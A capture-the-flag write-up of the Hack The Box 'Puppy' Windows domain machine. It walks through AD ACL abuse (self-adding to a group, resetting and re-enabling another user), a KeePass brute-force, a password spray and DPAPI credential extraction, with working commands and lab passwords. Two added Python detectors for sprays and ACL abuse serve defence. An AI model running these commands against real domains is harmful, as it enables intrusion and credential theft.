Puppy Medium Machine - Hack the Box
Medium-level Windows machine from Season 8.
Information
Puppy Machine is a medium-level Windows machine from Season 8.
As is common in real life Windows pentests, you will start this box with credentials for the following account:
levi.james / KingofAkron2025!
Tools
- nmap
- crackmapexec
- smbclient
- bloodhound
- keepass4brute
- evil-winrm
- impacket
Step by step
- Start with an Nmap scan for open ports and services:

```bash
nmap -T4 -p- -v -A -oX puppy_tcp.scan 10.10.11.70 --webxml
```
We found many open ports and the domain name: PUPPY.HTB
- SMB share listing:

```bash
smbclient -L //10.10.11.70 -U levi.james --password=KingofAkron2025!
```

```text
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
DEV             Disk      DEV-SHARE for PUPPY-DEVS
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
SYSVOL          Disk      Logon server share
```
If we try to access the DEV share we get a permission error.
- BloodHound collection:

```bash
bloodhound-python -d PUPPY.HTB -u levi.james -p "KingofAkron2025!" -gc dc.puppy.htb -c all -ns 10.10.11.70
```
In BloodHound we find many users and groups. Two interesting groups are “Developers” and “Senior Devs”, together with their members.
Looking at the relationships of the only user we have (levi.james), we can see that he is a member of the “HR” group, and that this group has “GenericWrite” over the “Developers” group.
- We can abuse the “GenericWrite” relation by adding the user “levi.james” to the “Developers” group:

```bash
net rpc group addmem "Developers" "levi.james" -U "PUPPY.HTB"/"levi.james"%"KingofAkron2025!" -S "DC.PUPPY.HTB"
```
We can check whether the previous command was successful:

```bash
net rpc group members "Developers" -U "PUPPY.HTB"/"levi.james"%"KingofAkron2025!" -S "DC.PUPPY.HTB"
```
Now we should have access to the “DEV” shared folder:

```text
smbclient //10.10.11.70/DEV -U levi.james --password=KingofAkron2025!
smb: \> dir
  .                                  DR        0  Sun Mar 23 04:07:57 2025
  ..                                  D        0  Sat Mar  8 13:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 04:09:12 2025
  Projects                            D        0  Sat Mar  8 13:53:36 2025
  recovery.kdbx                       A     2677  Tue Mar 11 23:25:46 2025
```
Projects is an empty folder, but we can download the “recovery.kdbx” file and check whether we can read its contents.
- The “recovery.kdbx” file is password-protected, but we can attempt to brute-force the password:

```bash
./keepass4brute.sh /HTB/Season8/Puppy/recovery.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
Having obtained the password, we can open the file and see its contents.
Inside the file we find many users and passwords.
- Trying a password spray with the users and passwords we found:

```bash
crackmapexec smb 10.10.11.70 -u users.txt -p passwords.txt --continue-on-success
```
One of the users has a valid password: ant.edwards
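From the defender's side, the spray above leaves a recognisable trace: one source address failing against many different accounts in a short window, often followed by a single success. The following is an added example (not part of the original walkthrough) that runs that detection logic over a few constructed logon records; the event IDs 4625 (failed logon) and 4624 (successful logon) are standard Windows Security events, while the record format, the sample addresses and the thresholds are assumptions made for the example.

```python
"""Password-spray detector over constructed Windows logon events.

Added example, not code from the original writeup. Each record is assumed to be
'timestamp,event_id,account,source_ip'; 4625 = failed logon, 4624 = successful
logon. A source that fails against `min_accounts` distinct accounts within
`window` is reported, together with any account that then logged on from it.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs from the machine).
SAMPLE_EVENTS = """\
2025-03-23T10:00:01,4625,levi.james,10.10.14.5
2025-03-23T10:00:02,4625,adam.silver,10.10.14.5
2025-03-23T10:00:03,4625,steph.cooper,10.10.14.5
2025-03-23T10:00:04,4625,jamie.williams,10.10.14.5
2025-03-23T10:00:05,4624,ant.edwards,10.10.14.5
2025-03-23T10:05:00,4625,levi.james,10.10.11.20
2025-03-23T10:06:00,4624,levi.james,10.10.11.20
"""


def parse_events(text):
    """Parse the CSV-style records into dicts with a datetime and an int event id."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, src = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "id": int(event_id),
                       "account": account, "src": src})
    return events


def detect_spray(events, min_accounts=3, window=timedelta(minutes=5)):
    """Return {source_ip: {"accounts": [...], "success": [...]}} for each source
    whose failures cover at least `min_accounts` distinct accounts inside `window`.
    "success" lists accounts that logged on from the same source between the start
    of the spray window and one further window after its last failure."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_src[ev["src"]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        # Slide a window over the failures; report the first window that trips.
        for i, start in enumerate(failures):
            in_window = [e for e in failures[i:] if e["time"] - start["time"] <= window]
            accounts = {e["account"] for e in in_window}
            if len(accounts) >= min_accounts:
                window_end = in_window[-1]["time"]
                successes = sorted({
                    e["account"] for e in evs
                    if e["id"] == 4624
                    and start["time"] <= e["time"] <= window_end + window
                })
                findings[src] = {"accounts": sorted(accounts), "success": successes}
                break
    return findings


if __name__ == "__main__":
    for src, info in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"{src}: failed for {info['accounts']}, then logged on as {info['success']}")
```

In the constructed sample, 10.10.14.5 is reported (four accounts failed within seconds, then ant.edwards logs on) while 10.10.11.20, a single user mistyping once, is not. Tune `min_accounts` and `window` to the environment; the point is to key on distinct target accounts per source, not on failure count per account, which is what lets a slow spray slip past per-account lockout thresholds.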
- Looking in BloodHound we can see that levi.james and ant.edwards don't have remote access permission, but adam.silver does.
From the ant.edwards user we find a “GenericAll” relation to adam.silver, so we can abuse it in several ways; one of them is changing his password:

```bash
net rpc password "adam.silver" "Test12345!" -U "PUPPY.HTB"/"ant.edwards"%"Antman2025!" -S "DC.PUPPY.HTB"
```
Now we should have access through evil-winrm, but one particular problem with adam.silver is that the account is disabled, so we need to enable it first:

```bash
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p Antman2025! remove uac adam.silver -f ACCOUNTDISABLE
```

With the account enabled, we can log in:

```bash
evil-winrm -i 10.10.11.70 -u adam.silver -p Test12345!
```
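Both ACL abuses in this chain (the GenericWrite self-add to “Developers” earlier, and the GenericAll password reset plus re-enable of adam.silver here) are ordinary directory changes that the domain controller logs. The following is an added example (not from the original writeup) that correlates constructed records of those events into the two findings a defender would want: a watched group modified by someone who is not an approved admin (including a user adding themselves), and a password reset of another account followed shortly by the same actor enabling that account. The event IDs 4728 (member added to a security-enabled global group), 4724 (password reset attempt) and 4722 (user account enabled) are standard Windows Security events; the record format, the group and admin lists and the time window are assumptions made for the example.

```python
"""Correlate directory-change events that match the ACL-abuse steps in this box.

Added example, not code from the original writeup. Records are assumed to be
'timestamp,event_id,subject,target,group' where subject is the account that
performed the action and target is the account acted on; the group field is
empty except for membership events. Event IDs assumed: 4728 member added to a
security-enabled global group, 4724 password reset attempt, 4722 account enabled.
"""
from datetime import datetime, timedelta

# Constructed sample records (not real logs from the machine).
SAMPLE_EVENTS = """\
2025-03-23T11:00:00,4728,levi.james,levi.james,Developers
2025-03-23T11:30:00,4724,ant.edwards,adam.silver,
2025-03-23T11:31:00,4722,ant.edwards,adam.silver,
2025-03-23T12:00:00,4724,svc_helpdesk,jamie.williams,
2025-03-23T13:00:00,4728,Administrator,jamie.williams,Senior Devs
"""

# Groups whose membership should only change through an approved process,
# and the accounts allowed to change them (assumed for the example).
WATCHED_GROUPS = {"Developers", "Senior Devs"}
APPROVED_ADMINS = {"Administrator"}


def parse_events(text):
    """Parse the CSV-style records into dicts; the group field may be empty."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, subject, target, group = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "id": int(event_id),
                       "subject": subject, "target": target, "group": group})
    return events


def find_suspicious_group_changes(events):
    """Membership additions to a watched group by a non-approved subject.
    Returns (subject, member, group, self_add) tuples."""
    return [
        (e["subject"], e["target"], e["group"], e["subject"] == e["target"])
        for e in events
        if e["id"] == 4728
        and e["group"] in WATCHED_GROUPS
        and e["subject"] not in APPROVED_ADMINS
    ]


def find_takeover_chains(events, window=timedelta(minutes=10)):
    """A reset of someone else's password (4724, subject != target) followed by
    the same subject enabling the same account (4722) within `window`.
    Returns (subject, target) pairs, one per chain."""
    resets = [e for e in events if e["id"] == 4724 and e["subject"] != e["target"]]
    enables = [e for e in events if e["id"] == 4722]
    chains = []
    for reset in resets:
        for enable in enables:
            same_actor = enable["subject"] == reset["subject"]
            same_account = enable["target"] == reset["target"]
            delta = enable["time"] - reset["time"]
            if same_actor and same_account and timedelta(0) <= delta <= window:
                chains.append((reset["subject"], reset["target"]))
                break
    return chains


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for subject, member, group, self_add in find_suspicious_group_changes(evs):
        tag = " (self-add)" if self_add else ""
        print(f"{subject} added {member} to {group}{tag}")
    for subject, target in find_takeover_chains(evs):
        print(f"{subject} reset and re-enabled {target}")
```

On the sample data only the two events that mirror this walkthrough are reported: levi.james adding himself to “Developers”, and ant.edwards resetting adam.silver's password and then enabling the account a minute later. The Administrator's change to “Senior Devs” and the lone helpdesk reset are left alone. The real fix for both findings is in the directory itself: the HR group should not hold GenericWrite on “Developers”, and ant.edwards should not hold GenericAll on another user, which is exactly what the BloodHound edges above make visible.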
USER FLAG PWNED
Browsing through evil-winrm we find a site backup located in C:\Backups.
- Downloading the previously mentioned backup, decompressing it and looking inside, we should see an XML.BAK file. Inside this file we find a new password for the user steph.cooper.
From our previous BloodHound research, steph.cooper has remote access permission, and there is another similar user: steph.cooper_adm.
It looks like steph.cooper has two separate accounts for different tasks (i.e. administrative tasks), so we can assume that steph.cooper uses the admin account from the normal one to access, read or write files and folders that he doesn't normally have access to.
- Following this idea, we can search for files encrypted with DPAPI (e.g. network-stored credentials) and try to brute-force the master key to decrypt their content.
We should see the master key located in:

```text
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
```

If we try to download it with evil-winrm we get an error, so we can base64-encode it on the target and decode it locally:

```powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"))
```

And then:

```bash
echo "base64encoded" | base64 -d > master.key
```
For the encrypted files, some of the usual locations are C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials, C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials, C:\Users\steph.cooper\AppData\Local\Microsoft\Vault, etc.
- In one of the previously mentioned locations we find a stored network credential for the user steph.cooper_adm:

```text
CREDENTIAL
  LastWritten : 2025-03-08 15:54:29
  Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
  Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
  Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
  Target      : Domain:target=PUPPY.HTB
  Description :
  Unknown     :
  Username    : steph.cooper_adm
  Unknown     : FivethChipOnItsWay2025!
```
Now we can try to access with this user:

```bash
evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p FivethChipOnItsWay2025!
```
SYSTEM FLAG PWNED